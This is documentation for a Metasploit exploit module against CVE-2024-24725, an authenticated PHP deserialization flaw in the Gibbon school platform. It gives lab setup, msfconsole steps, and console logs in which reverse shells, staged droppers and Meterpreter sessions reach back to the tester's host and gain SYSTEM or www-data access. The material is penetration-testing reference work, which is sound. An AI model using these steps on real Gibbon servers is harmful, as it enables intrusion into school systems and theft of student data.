## Vulnerable Application

A Remote Code Execution vulnerability in Gibbon online school platform version `26.0.00` and lower
allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request
to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

This module has been tested with:
* Gibbon online School Platform `v26.0.00` on Windows Server `2019` Standard running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.
* Gibbon online School Platform `v26.0.00` on Ubuntu `22.04` running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.

## Installation steps to install the Gibbon Online School Platform
* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
* Download the Gibbon School Platform software from [here](https://docs.gibbonedu.org/administrators/getting-started/download/).
* Install Gibbon following [these instructions](https://docs.gibbonedu.org/administrators/getting-started/installing-gibbon/).
* When installed, you should be able to access the Gibbon Online School Platform
* either thru `HTTP` port 80 or `HTTPS` port 443 depending on your configuration settings.

You are now ready to test the module.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/gibbon_auth_rce_cve_2024_24725`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set username <username>`
- [ ] `set password <password>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
- [ ] `exploit`

you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings.

## Options

### WEBSHELL
You can use this option to set the filename without extension of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.
### USERNAME
A valid Gibbon username to authenticate at the Gibbon School Platform.
You can use the e-mail address or the short name of the user.
### PASSWORD
The password of the Gibbon user in clear text format.

## Scenarios
```msf
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > info

       Name: Gibbon School Platform Authenticated PHP Deserialization Vulnerability
     Module: exploit/multi/http/gibbon_auth_rce_cve_2024_24725
   Platform: PHP, Unix, Linux, Windows
       Arch: php, cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-18

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev)

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper
      3   Windows Command
      4   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting        Required  Description
  ----       ---------------        --------  -----------
  PASSWORD                          yes       Password
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][
                                              ...]
  RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs
                                              /using-metasploit/basics/using-metasploit.html
  RPORT      443                    yes       The target port (TCP)
  SSL        true                   no        Negotiate SSL/TLS for outgoing connections
  SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                      yes       The Gibbon online school platform endpoint URL
  URIPATH                           no        The URI to use for this exploit (default is random)
  USERNAME                          yes       Gibbon username to login, typically an e-mail address
  VHOST                             no        HTTP server virtual host
  WEBSHELL                          no        Set webshell name without extension. Name will be randomly generated if left unset.


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                      address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower
  allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a
  POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
  to sensitive information.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-24725
  https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725
  https://packetstormsecurity.com/files/177635
  https://www.exploit-db.com/exploits/51903


View the full module info with the info -d command.
```
### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
```shell
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set rport 80
rport => 80
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set ssl false
ssl => false
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set username cuckoo@clock.com
username => cuckoo@clock.com
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set password dingdong
password => dingdong
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set rhosts 192.168.201.4
rhosts => 192.168.201.4
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.4
[+] Deleted FaYSQoZdlBg.php
[*] Meterpreter session 5 opened (192.168.201.8:4444 -> 192.168.201.4:49958) at 2024-04-01 15:07:30 +0000

meterpreter > sysinfo
Computer    : WIN-BJDNH44EEDB
OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username: SYSTEM
meterpreter > pwd
C:\wamp64\www
meterpreter >
```
### Target 1 - Unix Command `cmd/unix/reverse_bash` session
```shell
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 1
target => 1
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.44:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.44:33118) at 2024-04-01 19:51:43 +0000

pwd
/var/www
uname -a
Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
```
### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```shell
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 2
target => 2
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.44:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/gn2mFk
[*] Client 192.168.201.44 (Wget/1.21.2) requested /gn2mFk
[*] Sending payload to 192.168.201.44 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 192.168.201.44
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.44:46276) at 2024-04-01 19:57:04 +0000
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.44
OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
```
### Target 3 - Windows Command `cmd/windows/powershell/x64/meterpreter/reverse_tcp` session
```shell
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 3
target => 3
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
[*] Sending stage (201798 bytes) to 192.168.201.4
[*] Meterpreter session 6 opened (192.168.201.8:4444 -> 192.168.201.4:49962) at 2024-04-01 15:11:38 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Target 4 - Windows Dropper `windows/x64/meterpreter/reverse_tcp` session
```shell
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 4
target => 4
msf exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/877P8aB3
[*] Client 192.168.201.4 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /877P8aB3
[*] Sending payload to 192.168.201.4 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (201798 bytes) to 192.168.201.4
[*] Meterpreter session 7 opened (192.168.201.8:4444 -> 192.168.201.4:49967) at 2024-04-01 15:13:43 +0000
[*] Command Stager progress - 100.00% done (147/147 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

## Limitations
No limitations except for the fact that you need valid login credentials.
